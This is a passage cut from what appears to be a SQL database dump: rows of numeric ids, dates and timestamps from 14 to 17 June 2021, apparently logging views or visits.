15:41:50'),(24517,1602,1,'2021-06-14','2021-06-14 16:20:06'),(24518,1544,1,'2021-06-14','2021-06-14 16:26:18'),(24519,2457,1,'2021-06-14','2021-06-14 16:26:19'),(24520,1610,1,'2021-06-14','2021-06-14 16:26:32'),(24521,1594,1,'2021-06-14','2021-06-14 16:26:44'),(24522,2704,1,'2021-06-14','2021-06-14 16:26:55'),(24523,3005,1,'2021-06-14','2021-06-14 17:14:44'),(24524,1594,1,'2021-06-14','2021-06-14 17:22:36'),(24525,1594,1,'2021-06-14','2021-06-14 17:23:14'),(24526,1606,1,'2021-06-14','2021-06-14 17:44:11'),(24527,80,1,'2021-06-14','2021-06-14 17:44:35'),(24528,80,1,'2021-06-14','2021-06-14 17:58:18'),(24529,1606,1,'2021-06-14','2021-06-14 17:58:43'),(24530,80,1,'2021-06-14','2021-06-14 17:58:53'),(24531,1606,1,'2021-06-14','2021-06-14 18:00:18'),(24532,89,1,'2021-06-14','2021-06-14 18:00:59'),(24533,68,1,'2021-06-14','2021-06-14 18:02:12'),(24534,89,1,'2021-06-14','2021-06-14 18:33:50'),(24535,1588,1,'2021-06-14','2021-06-14 19:37:54'),(24536,1588,1,'2021-06-14','2021-06-14 19:37:56'),(24537,2154,1,'2021-06-14','2021-06-14 20:41:19'),(24538,3482,1,'2021-06-14','2021-06-14 21:09:55'),(24539,3482,1,'2021-06-14','2021-06-14 21:11:07'),(24540,1600,1,'2021-06-14','2021-06-14 21:19:28'),(24541,1766,1,'2021-06-14','2021-06-14 21:24:40'),(24542,1600,1,'2021-06-14','2021-06-14 21:28:13'),(24543,1602,1,'2021-06-14','2021-06-14 22:06:42'),(24544,1602,1,'2021-06-14','2021-06-14 22:06:53'),(24545,1596,1,'2021-06-14','2021-06-14 22:37:54'),(24546,2248,1,'2021-06-14','2021-06-14 22:47:30'),(24547,2457,1,'2021-06-14','2021-06-14 23:07:36'),(24548,1604,1,'2021-06-15','2021-06-15 00:03:44'),(24549,80,1,'2021-06-15','2021-06-15 00:04:10'),(24550,1604,1,'2021-06-15','2021-06-15 00:06:09'),(24551,1724,1,'2021-06-15','2021-06-15 00:44:28'),(24552,2248,1,'2021-06-15','2021-06-15 00:55:03'),(24553,2309,1,'2021-06-15','2021-06-15 01:09:23'),(24554,2309,1,'2021-06-15','2021-06-15 01:11:28'),(24555,2309,1,'2021-06-15','2021-06-15 01:43:25'),(24556,2309,1,'2021-06-15','2021-06-15 01:44:26'),(24557,1718,1,'2021-06-15','2021-06-15 03:14:26'),(24558,3531,1,'2021-06-15','2021-06-15 03:50:38'),(24559,1586,1,'2021-06-15','2021-06-15 05:00:07'),(24560,2904,1,'2021-06-15','2021-06-15 05:43:16'),(24561,335,1,'2021-06-15','2021-06-15 05:43:29'),(24562,68,1,'2021-06-15','2021-06-15 05:43:43'),(24563,3109,1,'2021-06-15','2021-06-15 06:25:36'),(24564,3030,1,'2021-06-15','2021-06-15 06:46:38'),(24565,1602,1,'2021-06-15','2021-06-15 08:01:56'),(24566,1602,1,'2021-06-15','2021-06-15 08:02:06'),(24567,76,1,'2021-06-15','2021-06-15 08:48:24'),(24568,1588,1,'2021-06-15','2021-06-15 08:56:17'),(24569,1614,1,'2021-06-15','2021-06-15 08:58:35'),(24570,87,1,'2021-06-15','2021-06-15 08:58:42'),(24571,3664,1,'2021-06-15','2021-06-15 08:58:43'),(24572,3664,1,'2021-06-15','2021-06-15 08:58:47'),(24573,3079,1,'2021-06-15','2021-06-15 08:59:15'),(24574,3079,1,'2021-06-15','2021-06-15 08:59:16'),(24575,469,1,'2021-06-15','2021-06-15 08:59:40'),(24576,1602,1,'2021-06-15','2021-06-15 09:16:17'),(24577,1602,1,'2021-06-15','2021-06-15 09:16:19'),(24578,1734,1,'2021-06-15','2021-06-15 09:18:47'),(24579,2309,1,'2021-06-15','2021-06-15 09:57:54'),(24580,2309,1,'2021-06-15','2021-06-15 09:58:29'),(24581,2309,1,'2021-06-15','2021-06-15 09:59:16'),(24582,1604,1,'2021-06-15','2021-06-15 10:11:06'),(24583,76,1,'2021-06-15','2021-06-15 10:11:52'),(24584,68,1,'2021-06-15','2021-06-15 10:14:05'),(24585,76,1,'2021-06-15','2021-06-15 10:14:20'),(24586,469,1,'2021-06-15','2021-06-15 10:15:37'),(24587,76,1,'2021-06-15','2021-06-15 10:18:32'),(24588,76,1,'2021-06-15','2021-06-15 10:20:26'),(24589,76,1,'2021-06-15','2021-06-15 10:21:02'),(24590,80,1,'2021-06-15','2021-06-15 10:21:50'),(24591,89,1,'2021-06-15','2021-06-15 10:26:27'),(24592,470,1,'2021-06-15','2021-06-15 10:28:48'),(24593,89,1,'2021-06-15','2021-06-15 10:29:35'),(24594,80,1,'2021-06-15','2021-06-15 10:29:39'),(24595,76,1,'2021-06-15','2021-06-15 10:30:00'),(24596,68,1,'2021-06-15','2021-06-15 10:30:06'),(24597,76,1,'2021-06-15','2021-06-15 10:30:10'),(24598,1604,1,'2021-06-15','2021-06-15 10:30:59'),(24599,1602,1,'2021-06-15','2021-06-15 10:41:58'),(24600,3092,1,'2021-06-15','2021-06-15 11:11:07'),(24601,3005,1,'2021-06-15','2021-06-15 11:27:10'),(24602,1600,1,'2021-06-15','2021-06-15 11:29:11'),(24603,91,1,'2021-06-15','2021-06-15 11:33:08'),(24604,3030,1,'2021-06-15','2021-06-15 11:34:35'),(24605,2248,1,'2021-06-15','2021-06-15 11:41:24'),(24606,2309,1,'2021-06-15','2021-06-15 11:58:05'),(24607,2971,1,'2021-06-15','2021-06-15 12:11:40'),(24608,3261,1,'2021-06-15','2021-06-15 12:41:38'),(24609,3087,1,'2021-06-15','2021-06-15 12:57:02'),(24610,1602,1,'2021-06-15','2021-06-15 13:19:39'),(24611,68,1,'2021-06-15','2021-06-15 13:37:27'),(24612,1586,1,'2021-06-15','2021-06-15 13:58:16'),(24613,1713,1,'2021-06-15','2021-06-15 14:01:04'),(24614,1602,1,'2021-06-15','2021-06-15 14:25:29'),(24615,1602,1,'2021-06-15','2021-06-15 14:25:29'),(24616,2704,1,'2021-06-15','2021-06-15 14:42:43'),(24617,2159,1,'2021-06-15','2021-06-15 15:48:46'),(24618,1604,1,'2021-06-15','2021-06-15 16:06:38'),(24619,1592,1,'2021-06-15','2021-06-15 16:16:07'),(24620,1592,1,'2021-06-15','2021-06-15 16:16:08'),(24621,1592,1,'2021-06-15','2021-06-15 16:16:09'),(24622,2309,1,'2021-06-15','2021-06-15 17:05:34'),(24623,1596,1,'2021-06-15','2021-06-15 17:17:10'),(24624,1596,1,'2021-06-15','2021-06-15 17:17:29'),(24625,1596,1,'2021-06-15','2021-06-15 17:17:34'),(24626,1602,1,'2021-06-15','2021-06-15 18:48:52'),(24627,2410,1,'2021-06-15','2021-06-15 19:41:29'),(24628,1582,1,'2021-06-15','2021-06-15 21:20:34'),(24629,1602,1,'2021-06-16','2021-06-16 00:17:20'),(24630,2297,1,'2021-06-16','2021-06-16 00:49:22'),(24631,1586,1,'2021-06-16','2021-06-16 01:27:40'),(24632,1728,1,'2021-06-16','2021-06-16 01:47:05'),(24633,1606,1,'2021-06-16','2021-06-16 03:14:56'),(24634,80,1,'2021-06-16','2021-06-16 03:16:02'),(24635,1606,1,'2021-06-16','2021-06-16 03:16:17'),(24636,1606,1,'2021-06-16','2021-06-16 03:16:40'),(24637,1606,1,'2021-06-16','2021-06-16 03:16:46'),(24638,1606,1,'2021-06-16','2021-06-16 03:16:51'),(24639,1606,1,'2021-06-16','2021-06-16 03:22:10'),(24640,1606,1,'2021-06-16','2021-06-16 03:23:04'),(24641,80,1,'2021-06-16','2021-06-16 05:26:32'),(24642,1586,1,'2021-06-16','2021-06-16 05:37:38'),(24643,1594,1,'2021-06-16','2021-06-16 07:03:43'),(24644,1877,1,'2021-06-16','2021-06-16 07:19:52'),(24645,2152,1,'2021-06-16','2021-06-16 08:18:45'),(24646,1596,1,'2021-06-16','2021-06-16 08:41:41'),(24647,2148,1,'2021-06-16','2021-06-16 09:03:02'),(24648,1600,1,'2021-06-16','2021-06-16 09:48:38'),(24649,1772,1,'2021-06-16','2021-06-16 09:50:36'),(24650,1600,1,'2021-06-16','2021-06-16 09:52:05'),(24651,3109,1,'2021-06-16','2021-06-16 09:53:22'),(24652,1600,1,'2021-06-16','2021-06-16 09:54:29'),(24653,1614,1,'2021-06-16','2021-06-16 10:06:03'),(24654,1606,1,'2021-06-16','2021-06-16 10:19:59'),(24655,1734,1,'2021-06-16','2021-06-16 10:25:28'),(24656,1606,1,'2021-06-16','2021-06-16 10:56:16'),(24657,1612,1,'2021-06-16','2021-06-16 11:04:51'),(24658,1728,1,'2021-06-16','2021-06-16 11:26:05'),(24659,1602,1,'2021-06-16','2021-06-16 11:55:38'),(24660,1602,1,'2021-06-16','2021-06-16 12:22:45'),(24661,1602,1,'2021-06-16','2021-06-16 12:27:55'),(24662,80,1,'2021-06-16','2021-06-16 12:28:28'),(24663,1602,1,'2021-06-16','2021-06-16 12:31:17'),(24664,1602,1,'2021-06-16','2021-06-16 12:36:49'),(24665,2704,1,'2021-06-16','2021-06-16 13:53:39'),(24666,2457,1,'2021-06-16','2021-06-16 14:03:08'),(24667,1600,1,'2021-06-16','2021-06-16 14:12:51'),(24668,1728,1,'2021-06-16','2021-06-16 14:22:34'),(24669,72,1,'2021-06-16','2021-06-16 14:38:31'),(24670,1608,1,'2021-06-16','2021-06-16 14:44:05'),(24671,2609,1,'2021-06-16','2021-06-16 15:01:48'),(24672,3099,1,'2021-06-16','2021-06-16 15:29:19'),(24673,1602,1,'2021-06-16','2021-06-16 15:37:37'),(24674,3282,1,'2021-06-16','2021-06-16 15:39:48'),(24675,3287,1,'2021-06-16','2021-06-16 15:42:30'),(24676,3285,1,'2021-06-16','2021-06-16 15:42:33'),(24677,3282,1,'2021-06-16','2021-06-16 15:42:54'),(24678,3245,1,'2021-06-16','2021-06-16 15:45:09'),(24679,3541,1,'2021-06-16','2021-06-16 15:45:25'),(24680,76,1,'2021-06-16','2021-06-16 15:57:17'),(24681,108,1,'2021-06-16','2021-06-16 16:19:51'),(24682,1582,1,'2021-06-16','2021-06-16 16:21:06'),(24683,1602,1,'2021-06-16','2021-06-16 16:21:07'),(24684,1544,1,'2021-06-16','2021-06-16 16:21:07'),(24685,2457,1,'2021-06-16','2021-06-16 16:21:08'),(24686,1586,1,'2021-06-16','2021-06-16 16:21:09'),(24687,1610,1,'2021-06-16','2021-06-16 16:21:10'),(24688,1608,1,'2021-06-16','2021-06-16 16:21:11'),(24689,1600,1,'2021-06-16','2021-06-16 16:21:12'),(24690,1604,1,'2021-06-16','2021-06-16 16:21:12'),(24691,1747,1,'2021-06-16','2021-06-16 16:22:06'),(24692,2296,1,'2021-06-16','2021-06-16 16:22:07'),(24693,87,1,'2021-06-16','2021-06-16 16:23:19'),(24694,72,1,'2021-06-16','2021-06-16 16:23:50'),(24695,76,1,'2021-06-16','2021-06-16 16:23:56'),(24696,72,1,'2021-06-16','2021-06-16 16:25:25'),(24697,91,1,'2021-06-16','2021-06-16 16:25:30'),(24698,2617,1,'2021-06-16','2021-06-16 16:26:16'),(24699,89,1,'2021-06-16','2021-06-16 16:29:12'),(24700,72,1,'2021-06-16','2021-06-16 16:30:55'),(24701,87,1,'2021-06-16','2021-06-16 16:31:04'),(24702,1584,1,'2021-06-16','2021-06-16 16:31:25'),(24703,1745,1,'2021-06-16','2021-06-16 16:35:14'),(24704,1734,1,'2021-06-16','2021-06-16 16:42:28'),(24705,1610,1,'2021-06-16','2021-06-16 16:47:38'),(24706,1594,1,'2021-06-16','2021-06-16 16:51:38'),(24707,76,1,'2021-06-16','2021-06-16 16:55:43'),(24708,1870,1,'2021-06-16','2021-06-16 18:10:01'),(24709,1606,1,'2021-06-16','2021-06-16 18:19:32'),(24710,1606,1,'2021-06-16','2021-06-16 18:25:50'),(24711,3030,1,'2021-06-16','2021-06-16 18:26:16'),(24712,2457,1,'2021-06-16','2021-06-16 18:33:37'),(24713,1594,1,'2021-06-16','2021-06-16 18:34:23'),(24714,1594,1,'2021-06-16','2021-06-16 18:35:04'),(24715,1544,1,'2021-06-16','2021-06-16 18:47:07'),(24716,3287,1,'2021-06-16','2021-06-16 19:16:46'),(24717,1734,1,'2021-06-16','2021-06-16 19:36:26'),(24718,3287,1,'2021-06-16','2021-06-16 19:37:51'),(24719,3051,1,'2021-06-16','2021-06-16 19:49:26'),(24720,1606,1,'2021-06-16','2021-06-16 20:10:20'),(24721,1606,1,'2021-06-16','2021-06-16 20:10:24'),(24722,1606,1,'2021-06-16','2021-06-16 20:10:26'),(24723,2161,1,'2021-06-16','2021-06-16 22:11:25'),(24724,1602,1,'2021-06-16','2021-06-16 23:38:53'),(24725,68,1,'2021-06-16','2021-06-16 23:39:42'),(24726,1606,1,'2021-06-16','2021-06-16 23:53:31'),(24727,1586,1,'2021-06-17','2021-06-17 00:19:30'),(24728,3083,1,'2021-06-17','2021-06-17 00:25:08'),(24729,1594,1,'2021-06-17','2021-06-17 01:00:21'),(24730,3124,1,'2021-06-17','2021-06-17 01:07:15'),(24731,478,1,'2021-06-17','2021-06-17 01:23:11'),(24732,478,1,'2021-06-17','2021-06-17 01:23:14'),(24733,1592,1,'2021-06-17','2021-06-17 01:29:45'),(24734,91,1,'2021-06-17','2021-06-17 01:31:43'),(24735,91,1,'2021-06-17','2021-06-17 01:31:46'),(24736,91,1,'2021-06-17','2021-06-17 01:31:52'),(24737,478,1,'2021-06-17','2021-06-17 02:17:01'),(24738,1612,1,'2021-06-17','2021-06-17 02:36:27'),(24739,469,1,'2021-06-17','2021-06-17 02:46:31'),(24740,1586,1,'2021-06-17','2021-06-17 03:44:32'),(24741,1586,1,'2021-06-17','2021-06-17 04:00:13'),(24742,1600,1,'2021-06-17','2021-06-17 04:17:34'),(24743,3691,1,'2021-06-17','2021-06-17 04:19:48'),(24744,3313,1,'2021-06-17','2021-06-17 04:37:11'),(24745,468,1,'2021-06-17','2021-06-17 04:47:26'),(24746,472,1,'2021-06-17','2021-06-17 05:00:17'),(24747,80,1,'2021-06-17','2021-06-17 05:07:18'),(24748,3245,1,'2021-06-17','2021-06-17 05:07:46'),(24749,1614,1,'2021-06-17','2021-06-17 05:10:02'),(24750,3030,1,'2021-06-17','2021-06-17 05:17:10'),(24751,1596,1,'2021-06-17','2021-06-17 05:17:12'),(24752,1598,1,'2021-06-17','2021-06-17 05:27:14'),(24753,1594,1,'2021-06-17','2021-06-17 05:27:36'),(24754,1586,1,'2021-06-17','2021-06-17 05:27:57'),(24755,1604,1,'2021-06-17','2021-06-17 05:30:48'),(24756,2609,1,'2021-06-17','2021-06-17 05:52:27'),(24757,2490,1,'2021-06-17','2021-06-17 05:56:08'),(24758,2309,1,'2021-06-17','2021-06-17 05:57:10'),(24759,2804,1,'2021-06-17','2021-06-17 06:00:03'),(24760,1582,1,'2021-06-17','2021-06-17 06:03:36'),(24761,1602,1,'2021-06-17','2021-06-17 06:11:35'),(24762,2165,1,'2021-06-17','2021-06-17 06:17:32'),(24763,2457,1,'2021-06-17','2021-06-17 06:17:54'),(24764,1600,1,'2021-06-17','2021-06-17 06:18:08'),(24765,470,1,'2021-06-17','2021-06-17 06:27:47'),(24766,2769,1,'2021-06-17','2021-06-17 06:29:54'),(24767,1774,1,'2021-06-17','2021-06-17 06:32:03'),(24768,1588,1,'2021-06-17','2021-06-17 06:36:40'),(24769,2309,1,'2021-06-17','2021-06-17 06:39:42'),(24770,2704,1,'2021-06-17','2021-06-17 06:48:04'),(24771,1598,1,'2021-06-17','2021-06-17 06:48:05'),(24772,1614,1,'2021-06-17','2021-06-17 06:48:23'),(24773,1544,1,'2021-06-17','2021-06-17 06:57:56'),(24774,570,1,'2021-06-17','2021-06-17 06:58:01'),(24775,1588,1,'2021-06-17','2021-06-17 07:02:12'),(24776,1602,1,'2021-06-17','2021-06-17 07:03:42'),(24777,1747,1,'2021-06-17','2021-06-17 07:12:09'),(24778,470,1,'2021-06-17','2021-06-17 07:12:38'),(24779,3675,1,'2021-06-17','2021-06-17 07:19:49'),(24780,3243,1,'2021-06-17','2021-06-17 07:21:56'),(24781,468,1,'2021-06-17','2021-06-17 07:26:38'),(24782,2809,1,'2021-06-17','2021-06-17 07:27:45'),(24783,477,1,'2021-06-17','2021-06-17 07:28:59'),(24784,1734,1,'2021-06-17','2021-06-17 07:32:13'),(24785,1718,1,'2021-06-17','2021-06-17 07:37:40'),(24786,2813,1,'2021-06-17','2021-06-17 07:54:30'),(24787,2704,1,'2021-06-17','2021-06-17 07:57:41'),(24788,1734,1,'2021-06-17','2021-06-17 07:57:44'),(24789,3486,1,'2021-06-17','2021-06-17 08:01:02'),(24790,2156,1,'2021-06-17','2021-06-17 08:06:54'),(24791,91,1,'2021-06-17','2021-06-17 08:08:21'),(24792,91,1,'2021-06-17','2021-06-17 08:08:58'),(24793,2609,1,'2021-06-17','2021-06-17 08:10:34'),(24794,1870,1,'2021-06-17','2021-06-17 08:20:29'),(24795,3486,1,'2021-06-17','2021-06-17 08:28:04'),(24796,3127,1,'2021-06-17','2021-06-17 08:31:09'),(24797,3069,1,'2021-06-17','2021-06-17 08:38:11'),(24798,2956,1,'2021-06-17','2021-06-17 08:38:16'),(24799,3498,1,'2021-06-17','2021-06-17 08:40:52'),(24800,2809,1,'2021-06-17','2021-06-17 08:48:25'),(24801,1586,1,'2021-06-17','2021-06-17 08:49:55'),(24802,1586,1,'2021-06-17','2021-06-17 08:56:32'),(24803,570,1,'2021-06-17','2021-06-17 08:56:46'),(24804,1718,1,'2021-06-17','2021-06-17 08:58:35'),(24805,3430,1,'2021-06-17','2021-06-17 09:01:33'),(24806,3313,1,'2021-06-17','2021-06-17 09:05:16'),(24807,2558,1,'2021-06-17','2021-06-17 09:08:40'),(24808,3307,1,'2021-06-17','2021-06-17 09:10:53'),(24809,1592,1,'2021-06-17','2021-06-17 09:11:26'),(24810,1778,1,'2021-06-17','2021-06-17 09:14:05'),(24811,1778,1,'2021-06-17','2021-06-17 09:14:42'),(24812,2813,1,'2021-06-17','2021-06-17 09:21:16'),(24813,3253,1,'2021-06-17','2021-06-17 09:23:26'),(24814,1778,1,'2021-06-17','2021-06-17 09:28:21'),(24815,1610,1,'2021-06-17','2021-06-17 09:28:37'),(24816,1778,1,'2021-06-17','2021-06-17 09:28:38'),(24817,1596,1,'2021-06-17','2021-06-17 09:32:25'),(24818,2165,1,'2021-06-17','2021-06-17 09:37:07'),(24819,1602,1,'2021-06-17','2021-06-17 09:39:49'),(24820,89,1,'2021-06-17','2021-06-17 09:41:33'),(24821,3030,1,'2021-06-17','2021-06-17 09:48:56'),(24822,2617,1,'2021-06-17','2021-06-17 09:48:59'),(24823,3247,1,'2021-06-17','2021-06-17 09:58:57'),(24824,2617,1,'2021-06-17','2021-06-17 10:03:06'),(24825,3714,1,'2021-06-17','2021-06-17 10:08:54'),(24826,2775,1,'2021-06-17','2021-06-17 10:08:56'),(24827,2178,1,'2021-06-17','2021-06-17 10:11:45'),(24828,3534,1,'2021-06-17','2021-06-17 10:21:08'),(24829,74,1,'2021-06-17','2021-06-17 10:23:00'),(24830,72,1,'2021-06-17','2021-06-17 10:23:20'),(24831,3005,1,'2021-06-17','2021-06-17 10:28:52'),(24832,3045,1,'2021-06-17','2021-06-17 10:38:59'),(24833,1766,1,'2021-06-17','2021-06-17 10:43:58'),(24834,1745,1,'2021-06-17','2021-06-17 10:44:01'),(24835,3710,1,'2021-06-17','2021-06-17 10:48:42'),(24836,1780,1,'2021-06-17','2021-06-17 10:53:53'),(24837,3498,1,'2021-06-17','2021-06-17 11:03:07'),(24838,2751,1,'2021-06-17','2021-06-17 11:08:21'),(24839,3034,1,'2021-06-17','2021-06-17 11:10:46'),(24840,1602,1,'2021-06-17','2021-06-17 11:12:15'),(24841,3271,1,'2021-06-17','2021-06-17 11:21:30'),(24842,3287,1,'2021-06-17','2021-06-17 11:31:30'),(24843,76,1,'2021-06-17','2021-06-17 11:32:34'),(24844,1728,1,'2021-06-17','2021-06-17 11:33:31'),(24845,2159,1,'2021-06-17','2021-06-17 11:37:29'),(24846,1728,1,'2021-06-17','2021-06-17 11:37:39'),(24847,1602,1,'2021-06-17','2021-06-17 11:37:51'),(24848,2297,1,'2021-06-17','2021-06-17 11:38:43'),(24849,1612,1,'2021-06-17','2021-06-17 11:38:48'),(24850,469,1,'2021-06-17','2021-06-17 11:38:51'),(24851,2395,1,'2021-06-17','2021-06-17 11:51:41'),(24852,1766,1,'2021-06-17','2021-06-17 11:58:55'),(24853,476,1,'2021-06-17','2021-06-17 11:58:57'),(24854,3107,1,'2021-06-17','2021-06-17 12:01:42'),(24855,108,1,'2021-06-17','2021-06-17 12:03:40'),(24856,2419,1,'2021-06-17','2021-06-17 12:05:02'),(24857,108,1,'2021-06-17','2021-06-17 12:07:12'),(24858,1606,1,'2021-06-17','2021-06-17 12:09:19'),(24859,2490,1,'2021-06-17','2021-06-17 12:14:44'),(24860,3259,1,'2021-06-17','2021-06-17 12:17:18'),(24861,2420,1,'2021-06-17','2021-06-17 12:19:02'),(24862,3251,1,'2021-06-17','2021-06-17 12:22:01'),(24863,3226,1,'2021-06-17','2021-06-17 12:29:09'),(24864,3287,1,'2021-06-17','2021-06-17 12:29:12'),(24865,2159,1,'2021-06-17','2021-06-17 12:30:27'),(24866,1749,1,'2021-06-17','2021-06-17 12:39:11'),(24867,3083,1,'2021-06-17','2021-06-17 12:42:03'),(24868,1592,1,'2021-06-17','2021-06-17 12:45:47'),(24869,3285,1,'2021-06-17','2021-06-17 12:50:39'),(24870,2911,1,'2021-06-17','2021-06-17 12:59:22'),(24871,2457,1,'2021-06-17','2021-06-17 13:02:27'),(24872,80,1,'2021-06-17','2021-06-17 13:10:05'),(24873,3072,1,'2021-06-17','2021-06-17 13:10:54'),(24874,80,1,'2021-06-17','2021-06-17 13:12:46'),(24875,1741,1,'2021-06-17','2021-06-17 13:14:18'),(24876,2410,1,'2021-06-17','2021-06-17 13:15:17'),(24877,3430,1,'2021-06-17','2021-06-17 13:24:02'),(24878,80,1,'2021-06-17','2021-06-17 13:26:45'),(24879,3316,1,'2021-06-17','2021-06-17 13:29:22'),(24880,3245,1,'2021-06-17','2021-06-17 13:29:25'),(24881,1604,1,'2021-06-17','2021-06-17 13:29:40'),(24882,2934,1,'2021-06-17','2021-06-17 13:49:15'),(24883,1703,1,'2021-06-17','2021-06-17 13:49:38'),(24884,1604,1,'2021-06-17','2021-06-17 13:59:24'),(24885,3313,1,'2021-06-17','2021-06-17 14:02:43'),(24886,1604,1,'2021-06-17','2021-06-17 14:09:25'),(24887,1610,1,'2021-06-17','2021-06-17 14:20:49'),(24888,80,1,'2021-06-17','2021-06-17 14:37:33'),(24889,91,1,'2021-06-17','2021-06-17 14:39:20'),(24890,1582,1,'2021-06-17','2021-06-17 14:39:52'),(24891,3541,1,'2021-06-17','2021-06-17 14:40:01'),(24892,3058,1,'2021-06-17','2021-06-17 14:49:57'),(24893,1711,1,'2021-06-17','2021-06-17 14:50:00'),(24894,3704,1,'2021-06-17','2021-06-17 14:52:02'),(24895,3269,1,'2021-06-17','2021-06-17 15:00:04'),(24896,1602,1,'2021-06-17','2021-06-17 15:10:07'),(24897,1604,1,'2021-06-17','2021-06-17 15:15:23'),(24898,1604,1,'2021-06-17','2021-06-17 15:15:44'),(24899,84,1,'2021-06-17','2021-06-17 15:16:11'),(24900,68,1,'2021-06-17','2021-06-17 15:17:16'),(24901,84,1,'2021-06-17','2021-06-17 15:17:38'),(24902,1604,1,'2021-06-17','2021-06-17 15:17:59'),(24903,2804,1,'2021-06-17','2021-06-17 15:23:09'),(24904,470,1,'2021-06-17','2021-06-17 15:23:20'),(24905,470,1,'2021-06-17','2021-06-17 15:24:30'),(24906,2156,1,'2021-06-17','2021-06-17 15:30:05'),(24907,3257,1,'2021-06-17','2021-06-17 15:31:41'),(24908,1772,1,'2021-06-17','2021-06-17 15:31:43'),(24909,2751,1,'2021-06-17','2021-06-17 15:32:35'),(24910,1745,1,'2021-06-17','2021-06-17 15:35:28'),(24911,2297,1,'2021-06-17','2021-06-17 15:41:03'),(24912,2775,1,'2021-06-17','2021-06-17 15:42:16'),(24913,1598,1,'2021-06-17','2021-06-17 15:50:55'),(24914,1772,1,'2021-06-17','2021-06-17 15:51:17'),(24915,3259,1,'2021-06-17','2021-06-17 15:52:47'),(24916,468,1,'2021-06-17','2021-06-17 15:53:14'),(24917,472,1,'2021-06-17','2021-06-17 16:00:11'),(24918,2609,1,'2021-06-17','2021-06-17 16:00:14'),(24919,2804,1,'2021-06-17','2021-06-17 16:03:04'),(24920,1747,1,'2021-06-17','2021-06-17 16:10:48'),(24921,3313,1,'2021-06-17','2021-06-17 16:13:15'),(24922,1602,1,'2021-06-17','2021-06-17 16:24:16'),(24923,3694,1,'2021-06-17','2021-06-17 16:29:19'),(24924,1598,1,'2021-06-17','2021-06-17 16:34:28'),(24925,1734,1,'2021-06-17','2021-06-17 16:34:31'),(24926,468,1,'2021-06-17','2021-06-17 16:39:30'),(24927,2558,1,'2021-06-17','2021-06-17 16:41:32'),(24928,3245,1,'2021-06-17','2021-06-17 16:44:42'),(24929,2989,1,'2021-06-17','2021-06-17 16:45:32'),(24930,2769,1,'2021-06-17','2021-06-17 16:49:35'),(24931,3691,1,'2021-06-17','2021-06-17 16:51:28'),(24932,1734,1,'2021-06-17','2021-06-17 16:54:21'),(24933,3705,1,'2021-06-17','2021-06-17 16:59:28'),(24934,1586,1,'2021-06-17','2021-06-17 16:59:32'),(24935,3498,1,'2021-06-17','2021-06-17 16:59:59'),(24936,3486,1,'2021-06-17','2021-06-17 17:01:36'),(24937,108,1,'2021-06-17','2021-06-17 17:09:15'),(24938,3034,1,'2021-06-17','2021-06-17 17:11:21'),(24939,1582,1,'2021-06-17','2021-06-17 17:19:31'),(24940,3694,1,'2021-06-17','2021-06-17 17:21:37'),(24941,484,1,'2021-06-17','2021-06-17 17:23:45'),(24942,1728,1,'2021-06-17','2021-06-17 17:29:38'),(24943,570,1,'2021-06-17','2021-06-17 17:29:39'),(24944,91,1,'2021-06-17','2021-06-17 17:29:41'),(24945,80,1,'2021-06-17','2021-06-17 17:29:51'),(24946,1728,1,'2021-06-17','2021-06-17 17:30:53'),(24947,1780,1,'2021-06-17','2021-06-17 17:39:54'),(24948,1749,1,'2021-06-17','2021-06-17 17:41:48'),(24949,3104,1,'2021-06-17','2021-06-17 17:44:06'),(24950,3104,1,'2021-06-17','2021-06-17 17:44:56'),(24951,3489,1,'2021-06-17','2021-06-17 17:45:59'),(24952,3092,1,'2021-06-17','2021-06-17 17:46:31'),(24953,3109,1,'2021-06-17','2021-06-17 17:53:08'),(24954,3307,1,'2021-06-17','2021-06-17 17:59:49'),(24955,1718,1,'2021-06-17','2021-06-17 18:00:10'),(24956,2558,1,'2021-06-17','2021-06-17 18:10:11'),(24957,1718,1,'2021-06-17','2021-06-17 18:10:14'),(24958,3253,1,'2021-06-17','2021-06-17 18:10:15'),(24959,1730,1,'2021-06-17','2021-06-17 18:12:06'),(24960,2309,1,'2021-06-17','2021-06-17 18:13:07'),(24961,2813,1,'2021-06-17','2021-06-17 18:20:27'),(24962,2165,1,'2021-06-17','2021-06-17 18:23:51'),(24963,3127,1,'2021-06-17','2021-06-17 18:30:21'),(24964,1606,1,'2021-06-17','2021-06-17 18:53:32'),(24965,80,1,'2021-06-17','2021-06-17 18:53:55'),(24966,1606,1,'2021-06-17','2021-06-17 18:54:00'),(24967,2769,1,'2021-06-17','2021-06-17 19:18:50'),(24968,3175,1,'2021-06-17','2021-06-17 19:27:22'),(24969,3030,1,'2021-06-17','2021-06-17 19:28:24'),(24970,68,1,'2021-06-17','2021-06-17 19:28:26'),(24971,3004,1,'2021-06-17','2021-06-17 19:28:27'),(24972,2751,1,'2021-06-17','2021-06-17 19:31:35'),(24973,3226,1,'2021-06-17','2021-06-17 19:34:23'),(24974,3030,1,'2021-06-17','2021-06-17 19:38:29'),(24975,1596,1,'2021-06-17','2021-06-17 19:38:30'),(24976,2154,1,'2021-06-17','2021-06-17 19:38:33'),(24977,3534,1,'2021-06-17','2021-06-17 19:41:53'),(24978,3005,1,'2021-06-17','2021-06-17 19:46:40'),(24979,2309,1,'2021-06-17','2021-06-17 19:48:28'),(24980,1741,1,'2021-06-17','2021-06-17 19:48:31'),(24981,2410,1,'2021-06-17','2021-06-17 20:01:00'),(24982,1774,1,'2021-06-17','2021-06-17 20:02:51'),(24983,1600,1,'2021-06-17','2021-06-17 20:08:47'),(24984,2809,1,'2021-06-17','2021-06-17 20:09:16'),(24985,477,1,'2021-06-17','2021-06-17 20:10:50'),(24986,3271,1,'2021-06-17','2021-06-17 20:18:56'),(24987,1600,1,'2021-06-17','2021-06-17 20:20:11'),(24988,1590,1,'2021-06-17','2021-06-17 20:29:32'),(24989,1610,1,'2021-06-17','2021-06-17 20:30:14'),(24990,2964,1,'2021-06-17','2021-06-17 20:37:13'),(24991,481,1,'2021-06-17','2021-06-17 20:38:28'),(24992,2154,1,'2021-06-17','2021-06-17 20:39:24'),(24993,2704,1,'2021-06-17','2021-06-17 20:40:26'),(24994,3107,1,'2021-06-17','2021-06-17 20:41:28'),(24995,1588,1,'2021-06-17','2021-06-17 20:49:55'),(24996,3290,1,'2021-06-17','2021-06-17 20:53:35'),(24997,3072,1,'2021-06-17','2021-06-17 20:58:59'),(24998,469,1,'2021-06-17','2021-06-17 20:59:02'),(24999,80,1,'2021-06-17','2021-06-17 20:59:05'),(25000,2991,1,'2021-06-17','2021-06-17 21:09:02'),(25001,2178,1,'2021-06-17','2021-06-17 21:14:00'),(25002,3083,1,'2021-06-17','2021-06-17 